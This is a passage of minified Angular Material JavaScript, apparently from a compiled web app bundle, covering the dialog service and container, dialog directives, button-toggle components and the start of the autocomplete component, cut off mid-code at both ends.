this.openDialogs.find(i=>i.id===e)}ngOnDestroy(){C8(this._openDialogsAtThisLevel,e=>{!1===e.config.closeOnDestroy&&this._removeOpenDialog(e,!1)}),C8(this._openDialogsAtThisLevel,e=>e.close()),this._afterAllClosedAtThisLevel.complete(),this._afterOpenedAtThisLevel.complete(),this._openDialogsAtThisLevel=[]}_getOverlayConfig(e){const i=new yg({positionStrategy:e.positionStrategy||this._overlay.position().global().centerHorizontally().centerVertically(),scrollStrategy:e.scrollStrategy||this._scrollStrategy(),panelClass:e.panelClass,hasBackdrop:e.hasBackdrop,direction:e.direction,minWidth:e.minWidth,minHeight:e.minHeight,maxWidth:e.maxWidth,maxHeight:e.maxHeight,width:e.width,height:e.height,disposeOnNavigation:e.closeOnNavigation});return e.backdropClass&&(i.backdropClass=e.backdropClass),i}_attachContainer(e,i,n){var r;const c=n.injector||(null===(r=n.viewContainerRef)||void 0===r?void 0:r.injector),d=[{provide:oA,useValue:n},{provide:g8,useValue:i},{provide:nb,useValue:e}];let T;n.container?"function"==typeof n.container?T=n.container:(T=n.container.type,d.push(...n.container.providers(n))):T=lV;const k=new hp(T,n.viewContainerRef,Ko.create({parent:c||this._injector,providers:d}),n.componentFactoryResolver);return e.attach(k).instance}_attachDialogContent(e,i,n,r){if(e instanceof ho){const c=this._createInjector(r,i,n,void 0);let d={$implicit:r.data,dialogRef:i};r.templateContext&&(d=Object.assign(Object.assign({},d),"function"==typeof r.templateContext?r.templateContext():r.templateContext)),n.attachTemplatePortal(new Mm(e,null,d,c))}else{const c=this._createInjector(r,i,n,this._injector),d=n.attachComponentPortal(new hp(e,r.viewContainerRef,c,r.componentFactoryResolver));i.componentInstance=d.instance}}_createInjector(e,i,n,r){var c;const d=e.injector||(null===(c=e.viewContainerRef)||void 0===c?void 0:c.injector),T=[{provide:J1e,useValue:e.data},{provide:g8,useValue:i}];return e.providers&&("function"==typeof e.providers?T.push(...e.providers(i,e,n)):T.push(...e.providers)),e.direction&&(!d||!d.get(Cr,null,Da.Optional))&&T.push({provide:Cr,useValue:{value:e.direction,change:Bi()}}),Ko.create({parent:d||r,providers:T})}_removeOpenDialog(e,i){const n=this.openDialogs.indexOf(e);n>-1&&(this.openDialogs.splice(n,1),this.openDialogs.length||(this._ariaHiddenElements.forEach((r,c)=>{r?c.setAttribute("aria-hidden",r):c.removeAttribute("aria-hidden")}),this._ariaHiddenElements.clear(),i&&this._getAfterAllClosed().next()))}_hideNonDialogContentFromAssistiveTechnology(){const e=this._overlayContainer.getContainerElement();if(e.parentElement){const i=e.parentElement.children;for(let n=i.length-1;n>-1;n--){const r=i[n];r!==e&&"SCRIPT"!==r.nodeName&&"STYLE"!==r.nodeName&&!r.hasAttribute("aria-live")&&(this._ariaHiddenElements.set(r,r.getAttribute("aria-hidden")),r.setAttribute("aria-hidden","true"))}}}_getAfterAllClosed(){const e=this._parentDialog;return e?e._getAfterAllClosed():this._afterAllClosedAtThisLevel}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Ko),At(Z1e,8),At(t,12),At(ob),At(dV))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();function C8(t,a){let e=t.length;for(;e--;)a(t[e])}let a2e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[mV,t2e],imports:[bu,yu,Xy,yu]}),t})();function n2e(t,a){}const B1={params:{enterAnimationDuration:"150ms",exitAnimationDuration:"75ms"}},o2e={dialogContainer:nr("dialogContainer",[sn("void, exit",zi({opacity:0,transform:"scale(0.7)"})),sn("enter",zi({transform:"none"})),gn("* => enter",$P([En("{{enterAnimationDuration}} cubic-bezier(0, 0, 0.2, 1)",zi({transform:"none",opacity:1})),c4("@*",s4(),{optional:!0})]),B1),gn("* => void, * => exit",$P([En("{{exitAnimationDuration}} cubic-bezier(0.4, 0.0, 0.2, 1)",zi({opacity:0})),c4("@*",s4(),{optional:!0})]),B1)])};class rA{constructor(){this.role="dialog",this.panelClass="",this.hasBackdrop=!0,this.backdropClass="",this.disableClose=!1,this.width="",this.height="",this.maxWidth="80vw",this.data=null,this.ariaDescribedBy=null,this.ariaLabelledBy=null,this.ariaLabel=null,this.ariaModal=!0,this.autoFocus="first-tabbable",this.restoreFocus=!0,this.delayFocusTrap=!0,this.closeOnNavigation=!0,this.enterAnimationDuration=B1.params.enterAnimationDuration,this.exitAnimationDuration=B1.params.exitAnimationDuration}}let r2e=(()=>{class t extends lV{constructor(e,i,n,r,c,d,T,k){super(e,i,n,r,c,d,T,k),this._animationStateChanged=new Tt}_captureInitialFocus(){this._config.delayFocusTrap||this._trapFocus()}_openAnimationDone(e){this._config.delayFocusTrap&&this._trapFocus(),this._animationStateChanged.next({state:"opened",totalTime:e})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(rA),Ee(Ky),Ee(qi),Ee(nb),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],features:[ci],decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})(),s2e=(()=>{class t extends r2e{constructor(e,i,n,r,c,d,T,k,q){super(e,i,n,r,c,d,T,q),this._changeDetectorRef=k,this._state="enter"}_onAnimationDone({toState:e,totalTime:i}){"enter"===e?this._openAnimationDone(i):"exit"===e&&this._animationStateChanged.next({state:"closed",totalTime:i})}_onAnimationStart({toState:e,totalTime:i}){"enter"===e?this._animationStateChanged.next({state:"opening",totalTime:i}):("exit"===e||"void"===e)&&this._animationStateChanged.next({state:"closing",totalTime:i})}_startExitAnimation(){this._state="exit",this._changeDetectorRef.markForCheck()}_getAnimationState(){return{value:this._state,params:{enterAnimationDuration:this._config.enterAnimationDuration||B1.params.enterAnimationDuration,exitAnimationDuration:this._config.exitAnimationDuration||B1.params.exitAnimationDuration}}}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(z3),Ee(ga,8),Ee(rA),Ee(Ky),Ee(qi),Ee(nb),Ee(Ma),Ee(js))},t.\u0275cmp=Wt({type:t,selectors:[["mat-dialog-container"]],hostAttrs:["tabindex","-1",1,"mat-dialog-container"],hostVars:7,hostBindings:function(e,i){1&e&&GC("@dialogContainer.start",function(r){return i._onAnimationStart(r)})("@dialogContainer.done",function(r){return i._onAnimationDone(r)}),2&e&&(Gs("id",i._config.id),Rt("aria-modal",i._config.ariaModal)("role",i._config.role)("aria-labelledby",i._config.ariaLabel?null:i._ariaLabelledBy)("aria-label",i._config.ariaLabel)("aria-describedby",i._config.ariaDescribedBy||null),s1("@dialogContainer",i._getAnimationState()))},features:[ci],decls:1,vars:0,consts:[["cdkPortalOutlet",""]],template:function(e,i){1&e&&ne(0,n2e,0,0,"ng-template",0)},dependencies:[Cu],styles:[".mat-dialog-container{display:block;padding:24px;border-radius:4px;box-sizing:border-box;overflow:auto;outline:0;width:100%;height:100%;min-height:inherit;max-height:inherit}.cdk-high-contrast-active .mat-dialog-container{outline:solid 1px}.mat-dialog-content{display:block;margin:0 -24px;padding:0 24px;max-height:65vh;overflow:auto;-webkit-overflow-scrolling:touch}.mat-dialog-title{margin:0 0 20px;display:block}.mat-dialog-actions{padding:8px 0;display:flex;flex-wrap:wrap;min-height:52px;align-items:center;box-sizing:content-box;margin-bottom:-24px}.mat-dialog-actions.mat-dialog-actions-align-center,.mat-dialog-actions[align=center]{justify-content:center}.mat-dialog-actions.mat-dialog-actions-align-end,.mat-dialog-actions[align=end]{justify-content:flex-end}.mat-dialog-actions .mat-button-base+.mat-button-base,.mat-dialog-actions .mat-mdc-button-base+.mat-mdc-button-base{margin-left:8px}[dir=rtl] .mat-dialog-actions .mat-button-base+.mat-button-base,[dir=rtl] .mat-dialog-actions .mat-mdc-button-base+.mat-mdc-button-base{margin-left:0;margin-right:8px}"],encapsulation:2,data:{animation:[o2e.dialogContainer]}}),t})();class Gh{constructor(a,e,i){this._ref=a,this._containerInstance=i,this._afterOpened=new J,this._beforeClosed=new J,this._state=0,this.disableClose=e.disableClose,this.id=a.id,i._animationStateChanged.pipe(Dn(n=>"opened"===n.state),Cn(1)).subscribe(()=>{this._afterOpened.next(),this._afterOpened.complete()}),i._animationStateChanged.pipe(Dn(n=>"closed"===n.state),Cn(1)).subscribe(()=>{clearTimeout(this._closeFallbackTimeout),this._finishDialogClose()}),a.overlayRef.detachments().subscribe(()=>{this._beforeClosed.next(this._result),this._beforeClosed.complete(),this._finishDialogClose()}),ra(this.backdropClick(),this.keydownEvents().pipe(Dn(n=>27===n.keyCode&&!this.disableClose&&!es(n)))).subscribe(n=>{this.disableClose||(n.preventDefault(),uV(this,"keydown"===n.type?"keyboard":"mouse"))})}close(a){this._result=a,this._containerInstance._animationStateChanged.pipe(Dn(e=>"closing"===e.state),Cn(1)).subscribe(e=>{this._beforeClosed.next(a),this._beforeClosed.complete(),this._ref.overlayRef.detachBackdrop(),this._closeFallbackTimeout=setTimeout(()=>this._finishDialogClose(),e.totalTime+100)}),this._state=1,this._containerInstance._startExitAnimation()}afterOpened(){return this._afterOpened}afterClosed(){return this._ref.closed}beforeClosed(){return this._beforeClosed}backdropClick(){return this._ref.backdropClick}keydownEvents(){return this._ref.keydownEvents}updatePosition(a){let e=this._ref.config.positionStrategy;return a&&(a.left||a.right)?a.left?e.left(a.left):e.right(a.right):e.centerHorizontally(),a&&(a.top||a.bottom)?a.top?e.top(a.top):e.bottom(a.bottom):e.centerVertically(),this._ref.updatePosition(),this}updateSize(a="",e=""){return this._ref.updateSize(a,e),this}addPanelClass(a){return this._ref.addPanelClass(a),this}removePanelClass(a){return this._ref.removePanelClass(a),this}getState(){return this._state}_finishDialogClose(){this._state=2,this._ref.close(this._result,{focusOrigin:this._closeInteractionType}),this.componentInstance=null}}function uV(t,a,e){return t._closeInteractionType=a,t.close(e)}const _p=new ni("MatDialogData"),c2e=new ni("mat-dialog-default-options"),hV=new ni("mat-dialog-scroll-strategy"),d2e={provide:hV,deps:[As],useFactory:function l2e(t){return()=>t.scrollStrategies.block()}};let m2e=0,u2e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y){this._overlay=e,this._defaultOptions=n,this._parentDialog=r,this._dialogRefConstructor=T,this._dialogContainerType=k,this._dialogDataToken=q,this._openDialogsAtThisLevel=[],this._afterAllClosedAtThisLevel=new J,this._afterOpenedAtThisLevel=new J,this._idPrefix="mat-dialog-",this.afterAllClosed=rp(()=>this.openDialogs.length?this._getAfterAllClosed():this._getAfterAllClosed().pipe(Ro(void 0))),this._scrollStrategy=d,this._dialog=i.get(mV)}get openDialogs(){return this._parentDialog?this._parentDialog.openDialogs:this._openDialogsAtThisLevel}get afterOpened(){return this._parentDialog?this._parentDialog.afterOpened:this._afterOpenedAtThisLevel}_getAfterAllClosed(){const e=this._parentDialog;return e?e._getAfterAllClosed():this._afterAllClosedAtThisLevel}open(e,i){let n;(i=Object.assign(Object.assign({},this._defaultOptions||new rA),i)).id=i.id||`${this._idPrefix}${m2e++}`,i.scrollStrategy=i.scrollStrategy||this._scrollStrategy();const r=this._dialog.open(e,Object.assign(Object.assign({},i),{positionStrategy:this._overlay.position().global().centerHorizontally().centerVertically(),disableClose:!0,closeOnDestroy:!1,container:{type:this._dialogContainerType,providers:()=>[{provide:rA,useValue:i},{provide:oA,useValue:i}]},templateContext:()=>({dialogRef:n}),providers:(c,d,T)=>(n=new this._dialogRefConstructor(c,i,T),n.updatePosition(null==i?void 0:i.position),[{provide:this._dialogContainerType,useValue:T},{provide:this._dialogDataToken,useValue:d.data},{provide:this._dialogRefConstructor,useValue:n}])}));return n.componentInstance=r.componentInstance,this.openDialogs.push(n),this.afterOpened.next(n),n.afterClosed().subscribe(()=>{const c=this.openDialogs.indexOf(n);c>-1&&(this.openDialogs.splice(c,1),this.openDialogs.length||this._getAfterAllClosed().next())}),n}closeAll(){this._closeDialogs(this.openDialogs)}getDialogById(e){return this.openDialogs.find(i=>i.id===e)}ngOnDestroy(){this._closeDialogs(this._openDialogsAtThisLevel),this._afterAllClosedAtThisLevel.complete(),this._afterOpenedAtThisLevel.complete()}_closeDialogs(e){let i=e.length;for(;i--;)e[i].close()}}return t.\u0275fac=function(e){_d()},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),vu=(()=>{class t extends u2e{constructor(e,i,n,r,c,d,T,k){super(e,i,r,d,T,c,Gh,s2e,_p,k)}}return t.\u0275fac=function(e){return new(e||t)(At(As),At(Ko),At(iy,8),At(c2e,8),At(hV),At(t,12),At(ob),At(ar,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),h2e=0,vm=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this._elementRef=i,this._dialog=n,this.type="button"}ngOnInit(){this.dialogRef||(this.dialogRef=fV(this._elementRef,this._dialog.openDialogs))}ngOnChanges(e){const i=e._matDialogClose||e._matDialogCloseResult;i&&(this.dialogResult=i.currentValue)}_onButtonClick(e){uV(this.dialogRef,0===e.screenX&&0===e.screenY?"keyboard":"mouse",this.dialogResult)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh,8),Ee(mi),Ee(vu))},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-close",""],["","matDialogClose",""]],hostVars:2,hostBindings:function(e,i){1&e&&he("click",function(r){return i._onButtonClick(r)}),2&e&&Rt("aria-label",i.ariaLabel||null)("type",i.type)},inputs:{ariaLabel:["aria-label","ariaLabel"],type:"type",dialogResult:["mat-dialog-close","dialogResult"],_matDialogClose:["matDialogClose","_matDialogClose"]},exportAs:["matDialogClose"],features:[sa]}),t})(),Am=(()=>{class t{constructor(e,i,n){this._dialogRef=e,this._elementRef=i,this._dialog=n,this.id="mat-dialog-title-"+h2e++}ngOnInit(){this._dialogRef||(this._dialogRef=fV(this._elementRef,this._dialog.openDialogs)),this._dialogRef&&Promise.resolve().then(()=>{const e=this._dialogRef._containerInstance;e&&!e._ariaLabelledBy&&(e._ariaLabelledBy=this.id)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh,8),Ee(mi),Ee(vu))},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-title",""],["","matDialogTitle",""]],hostAttrs:[1,"mat-dialog-title"],hostVars:1,hostBindings:function(e,i){2&e&&Gs("id",i.id)},inputs:{id:"id"},exportAs:["matDialogTitle"]}),t})(),Tm=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-content",""],["mat-dialog-content"],["","matDialogContent",""]],hostAttrs:[1,"mat-dialog-content"]}),t})(),Em=(()=>{class t{constructor(){this.align="start"}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","mat-dialog-actions",""],["mat-dialog-actions"],["","matDialogActions",""]],hostAttrs:[1,"mat-dialog-actions"],hostVars:4,hostBindings:function(e,i){2&e&&Ct("mat-dialog-actions-align-center","center"===i.align)("mat-dialog-actions-align-end","end"===i.align)},inputs:{align:"align"}}),t})();function fV(t,a){let e=t.nativeElement.parentElement;for(;e&&!e.classList.contains("mat-dialog-container");)e=e.parentElement;return e?a.find(i=>i.id===e.id):null}let y8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[vu,d2e],imports:[a2e,bu,yu,la,la]}),t})();const f2e=["button"],p2e=["*"],pV=new ni("MAT_BUTTON_TOGGLE_DEFAULT_OPTIONS"),_V=new ni("MatButtonToggleGroup"),_2e={provide:Ls,useExisting:ja(()=>b8),multi:!0};let gV=0;class CV{constructor(a,e){this.source=a,this.value=e}}let b8=(()=>{class t{constructor(e,i){this._changeDetector=e,this._vertical=!1,this._multiple=!1,this._disabled=!1,this._controlValueAccessorChangeFn=()=>{},this._onTouched=()=>{},this._name="mat-button-toggle-group-"+gV++,this.valueChange=new Tt,this.change=new Tt,this.appearance=i&&i.appearance?i.appearance:"standard"}get name(){return this._name}set name(e){this._name=e,this._markButtonsForCheck()}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get value(){const e=this._selectionModel?this._selectionModel.selected:[];return this.multiple?e.map(i=>i.value):e[0]?e[0].value:void 0}set value(e){this._setSelectionByValue(e),this.valueChange.emit(this.value)}get selected(){const e=this._selectionModel?this._selectionModel.selected:[];return this.multiple?e:e[0]||null}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e),this._markButtonsForCheck()}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._markButtonsForCheck()}ngOnInit(){this._selectionModel=new I1(this.multiple,void 0,!1)}ngAfterContentInit(){this._selectionModel.select(...this._buttonToggles.filter(e=>e.checked))}writeValue(e){this.value=e,this._changeDetector.markForCheck()}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e}_emitChangeEvent(e){const i=new CV(e,this.value);this._controlValueAccessorChangeFn(i.value),this.change.emit(i)}_syncButtonToggle(e,i,n=!1,r=!1){!this.multiple&&this.selected&&!e.checked&&(this.selected.checked=!1),this._selectionModel?i?this._selectionModel.select(e):this._selectionModel.deselect(e):r=!0,r?Promise.resolve().then(()=>this._updateModelValue(e,n)):this._updateModelValue(e,n)}_isSelected(e){return this._selectionModel&&this._selectionModel.isSelected(e)}_isPrechecked(e){return void 0!==this._rawValue&&(this.multiple&&Array.isArray(this._rawValue)?this._rawValue.some(i=>null!=e.value&&i===e.value):e.value===this._rawValue)}_setSelectionByValue(e){this._rawValue=e,this._buttonToggles&&(this.multiple&&e?(Array.isArray(e),this._clearSelection(),e.forEach(i=>this._selectValue(i))):(this._clearSelection(),this._selectValue(e)))}_clearSelection(){this._selectionModel.clear(),this._buttonToggles.forEach(e=>e.checked=!1)}_selectValue(e){const i=this._buttonToggles.find(n=>null!=n.value&&n.value===e);i&&(i.checked=!0,this._selectionModel.select(i))}_updateModelValue(e,i){i&&this._emitChangeEvent(e),this.valueChange.emit(this.value)}_markButtonsForCheck(){var e;null===(e=this._buttonToggles)||void 0===e||e.forEach(i=>i._markForCheck())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(pV,8))},t.\u0275dir=Ot({type:t,selectors:[["mat-button-toggle-group"]],contentQueries:function(e,i,n){if(1&e&&fa(n,M8,5),2&e){let r;Vt(r=Bt())&&(i._buttonToggles=r)}},hostAttrs:["role","group",1,"mat-button-toggle-group"],hostVars:5,hostBindings:function(e,i){2&e&&(Rt("aria-disabled",i.disabled),Ct("mat-button-toggle-vertical",i.vertical)("mat-button-toggle-group-appearance-standard","standard"===i.appearance))},inputs:{appearance:"appearance",name:"name",vertical:"vertical",value:"value",multiple:"multiple",disabled:"disabled"},outputs:{valueChange:"valueChange",change:"change"},exportAs:["matButtonToggleGroup"],features:[ki([_2e,{provide:_V,useExisting:t}])]}),t})();const g2e=El(class{});let M8=(()=>{class t extends g2e{constructor(e,i,n,r,c,d){super(),this._changeDetectorRef=i,this._elementRef=n,this._focusMonitor=r,this._checked=!1,this.ariaLabelledby=null,this._disabled=!1,this.change=new Tt;const T=Number(c);this.tabIndex=T||0===T?T:null,this.buttonToggleGroup=e,this.appearance=d&&d.appearance?d.appearance:"standard"}get buttonId(){return`${this.id}-button`}get appearance(){return this.buttonToggleGroup?this.buttonToggleGroup.appearance:this._appearance}set appearance(e){this._appearance=e}get checked(){return this.buttonToggleGroup?this.buttonToggleGroup._isSelected(this):this._checked}set checked(e){const i=wi(e);i!==this._checked&&(this._checked=i,this.buttonToggleGroup&&this.buttonToggleGroup._syncButtonToggle(this,this._checked),this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled||this.buttonToggleGroup&&this.buttonToggleGroup.disabled}set disabled(e){this._disabled=wi(e)}ngOnInit(){const e=this.buttonToggleGroup;this.id=this.id||"mat-button-toggle-"+gV++,e&&(e._isPrechecked(this)?this.checked=!0:e._isSelected(this)!==this._checked&&e._syncButtonToggle(this,this._checked))}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0)}ngOnDestroy(){const e=this.buttonToggleGroup;this._focusMonitor.stopMonitoring(this._elementRef),e&&e._isSelected(this)&&e._syncButtonToggle(this,!1,!1,!0)}focus(e){this._buttonElement.nativeElement.focus(e)}_onButtonClick(){const e=!!this._isSingleSelector()||!this._checked;e!==this._checked&&(this._checked=e,this.buttonToggleGroup&&(this.buttonToggleGroup._syncButtonToggle(this,this._checked,!0),this.buttonToggleGroup._onTouched())),this.change.emit(new CV(this,this.value))}_markForCheck(){this._changeDetectorRef.markForCheck()}_getButtonName(){return this._isSingleSelector()?this.buttonToggleGroup.name:this.name||null}_isSingleSelector(){return this.buttonToggleGroup&&!this.buttonToggleGroup.multiple}}return t.\u0275fac=function(e){return new(e||t)(Ee(_V,8),Ee(Ma),Ee(mi),Ee(js),Vr("tabindex"),Ee(pV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-button-toggle"]],viewQuery:function(e,i){if(1&e&&Mi(f2e,5),2&e){let n;Vt(n=Bt())&&(i._buttonElement=n.first)}},hostAttrs:["role","presentation",1,"mat-button-toggle"],hostVars:12,hostBindings:function(e,i){1&e&&he("focus",function(){return i.focus()}),2&e&&(Rt("aria-label",null)("aria-labelledby",null)("id",i.id)("name",null),Ct("mat-button-toggle-standalone",!i.buttonToggleGroup)("mat-button-toggle-checked",i.checked)("mat-button-toggle-disabled",i.disabled)("mat-button-toggle-appearance-standard","standard"===i.appearance))},inputs:{disableRipple:"disableRipple",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],id:"id",name:"name",value:"value",tabIndex:"tabIndex",appearance:"appearance",checked:"checked",disabled:"disabled"},outputs:{change:"change"},exportAs:["matButtonToggle"],features:[ci],ngContentSelectors:p2e,decls:6,vars:9,consts:[["type","button",1,"mat-button-toggle-button","mat-focus-indicator",3,"id","disabled","click"],["button",""],[1,"mat-button-toggle-label-content"],[1,"mat-button-toggle-focus-overlay"],["matRipple","",1,"mat-button-toggle-ripple",3,"matRippleTrigger","matRippleDisabled"]],template:function(e,i){if(1&e&&(Jn(),m(0,"button",0,1),he("click",function(){return i._onButtonClick()}),m(2,"span",2),va(3),u()(),it(4,"span",3)(5,"span",4)),2&e){const n=Ti(1);V("id",i.buttonId)("disabled",i.disabled||null),Rt("tabindex",i.disabled?-1:i.tabIndex)("aria-pressed",i.checked)("name",i._getButtonName())("aria-label",i.ariaLabel)("aria-labelledby",i.ariaLabelledby),C(5),V("matRippleTrigger",n)("matRippleDisabled",i.disableRipple||i.disabled)}},dependencies:[Dl],styles:[".mat-button-toggle-standalone,.mat-button-toggle-group{position:relative;display:inline-flex;flex-direction:row;white-space:nowrap;overflow:hidden;border-radius:2px;-webkit-tap-highlight-color:rgba(0,0,0,0);transform:translateZ(0)}.cdk-high-contrast-active .mat-button-toggle-standalone,.cdk-high-contrast-active .mat-button-toggle-group{outline:solid 1px}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard,.mat-button-toggle-group-appearance-standard{border-radius:4px}.cdk-high-contrast-active .mat-button-toggle-standalone.mat-button-toggle-appearance-standard,.cdk-high-contrast-active .mat-button-toggle-group-appearance-standard{outline:0}.mat-button-toggle-vertical{flex-direction:column}.mat-button-toggle-vertical .mat-button-toggle-label-content{display:block}.mat-button-toggle{white-space:nowrap;position:relative}.mat-button-toggle .mat-icon svg{vertical-align:top}.mat-button-toggle.cdk-keyboard-focused .mat-button-toggle-focus-overlay{opacity:1}.mat-button-toggle-appearance-standard:not(.mat-button-toggle-disabled):hover .mat-button-toggle-focus-overlay{opacity:.04}.mat-button-toggle-appearance-standard.cdk-keyboard-focused:not(.mat-button-toggle-disabled) .mat-button-toggle-focus-overlay{opacity:.12}@media(hover: none){.mat-button-toggle-appearance-standard:not(.mat-button-toggle-disabled):hover .mat-button-toggle-focus-overlay{display:none}}.mat-button-toggle-label-content{-webkit-user-select:none;user-select:none;display:inline-block;line-height:36px;padding:0 16px;position:relative}.mat-button-toggle-appearance-standard .mat-button-toggle-label-content{padding:0 12px}.mat-button-toggle-label-content>*{vertical-align:middle}.mat-button-toggle-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;border-radius:inherit;pointer-events:none;opacity:0}.cdk-high-contrast-active .mat-button-toggle-checked .mat-button-toggle-focus-overlay{border-bottom:solid 36px;opacity:.5;height:0}.cdk-high-contrast-active .mat-button-toggle-checked:hover .mat-button-toggle-focus-overlay{opacity:.6}.cdk-high-contrast-active .mat-button-toggle-checked.mat-button-toggle-appearance-standard .mat-button-toggle-focus-overlay{border-bottom:solid 500px}.mat-button-toggle .mat-button-toggle-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-button-toggle-button{border:0;background:none;color:inherit;padding:0;margin:0;font:inherit;outline:none;width:100%;cursor:pointer}.mat-button-toggle-disabled .mat-button-toggle-button{cursor:default}.mat-button-toggle-button::-moz-focus-inner{border:0}"],encapsulation:2,changeDetection:0}),t})(),yV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[la,Od,la]}),t})();const C2e=["panel"];function y2e(t,a){if(1&t&&(m(0,"div",0,1),va(2),u()),2&t){const e=a.id,i=B();V("id",i.id)("ngClass",i._classList),Rt("aria-label",i.ariaLabel||null)("aria-labelledby",i._getPanelAriaLabelledby(e))}}const b2e=["*"];let M2e=0;class v2e{constructor(a,e){this.source=a,this.option=e}}const A2e=El(class{}),bV=new ni("mat-autocomplete-default-options",{providedIn:"root",factory:function T2e(){return{autoActiveFirstOption:!1,autoSelectActiveOption:!1}}});let E2e=(()=>{class t extends A2e{constructor(e,i,n,r){super(),this._changeDetectorRef=e,this._elementRef=i,this._activeOptionChanges=I.EMPTY,this.showPanel=!1,this._isOpen=!1,this.displayWith=null,this.optionSelected=new Tt,this.opened=new Tt,this.closed=new Tt,this.optionActivated=new Tt,this._classList={},this.id="mat-autocomplete-"+M2e++,this.inertGroups=(null==r?void 0:r.SAFARI)||!1,this._autoActiveFirstOption=!!n.autoActiveFirstOption,this._autoSelectActiveOption=!!n.autoSelectActiveOption}get isOpen(){return this._isOpen&&this.showPanel}get autoActiveFirstOption(){return this._autoActiveFirstOption}set autoActiveFirstOption(e){this._autoActiveFirstOption=wi(e)}get autoSelectActiveOption(){return this._autoSelectActiveOption}set autoSelectActiveOption(e){this._autoSelectActiveOption=wi(e)}set classList(e){this._classList=e&&e.length?function Lhe(t,a=/\s+/){const e=[];if(null!=t){const i=Array.isArray(t)?t:`${t}`.split(a);for(const n of i){const r=`${n}`.trim();r&&e.push(r)}}return e}(e).reduce((i,n)=>(i[n]=!0,i),{}):{},this._setVisibilityClasses(this._classList),this._elementRef.nativeElement.className=""}ngAfterContentInit(){this._keyManager=new Bz(this.options).withWrap(),this._activeOptionChanges=this._keyManager.change.subscribe(e=>{this.isOpen&&this.optionActivated.emit({source:this,option:this.options.toArray()[e]||null})}),this._setVisibility()}ngOnDestroy(){this._activeOptionChanges.unsubscribe()}_setScrollTop(e){this.panel&&(this.panel.nativeElement.scrollTop=e)}_getScrollTop(){return this.panel?this.panel.nativeElement.scrollTop:0}_setVisibility(){this.showPanel=!!this.options.length,this._setVisibilityClasses(this._classList),this._changeDetectorRef.markForCheck()}_emitSelectEvent(e){const i=new v2e(this,e);this.optionSelected.emit(i)}_getPanelAriaLabelledby(e){return this.ariaLabel?null:this.ariaLabelledby?(e?e+" ":"")+this.ariaLabelledby:e}_setVisibilityClasses(e){e[this._visibleClass]=this.showPanel,e[this._hiddenClass]=!this.showPanel}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma),Ee(mi),Ee(bV),Ee(cr))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(ho,7),Mi(C2e,5)),2&e){let n;Vt(n=Bt())&&(i.template=n.first),Vt(n=Bt())&&(i.panel=n.first)}},inputs:{ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],displayWith:"displayWith",autoActiveFirstOption:"autoActiveFirstOption",autoSelectActiveOption:"autoSelectActiveOption",panelWidth:"panelWidth",classList:["class","classList"]},outputs:{optionSelected:"optionSelected",opened:"opened",closed:"closed",optionActivated:"optionActivated"},features:[ci]}),t})(),D2e=(()=>{class t extends E2e{constructor(){super(...arguments),this._visibleClass="mat-autocomplete-visible",this._hiddenClass="mat-autocomplete-hidden"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-autocomplete"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,j3,5),fa(n,yr,5)),2&e){let r;Vt(r=Bt())&&(i.optionGroups=r),Vt(r=Bt())&&(i.options=r)}},hostAttrs:[1,"mat-autocomplete"],inputs:{disableRipple:"disableRipple"},exportAs:["matAutocomplete"],features:[ki([{provide:G3,useExisting:t}]),ci],ngContentSelectors:b2e,decls:1,vars:0,consts:[["role","listbox",1,"mat-autocomplete-panel",3,"id","ngClass"],["panel",""]],template:function(e,i){1&e&&(Jn(),ne(0,y2e,3,4,"ng-template"))},dependencies:[ig],styles:[".mat-autocomplete-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;visibility:hidden;max-width:none;max-height:256px;position:relative;width:100%;border-bottom-left-radius:4px;border-bottom-right-radius:4px}.mat-autocomplete-panel.mat-autocomplete-visible{visibility:visible}.mat-autocomplete-panel.mat-autocomplete-hidden{visibility:hidden}.mat-autocomplete-panel-above .mat-autocomplete-panel{border-radius:0;border-top-left-radius:4px;border-top-right-radius:4px}.mat-autocomplete-panel .mat-divider-horizontal{margin-top:-1px}.cdk-high-contrast-active 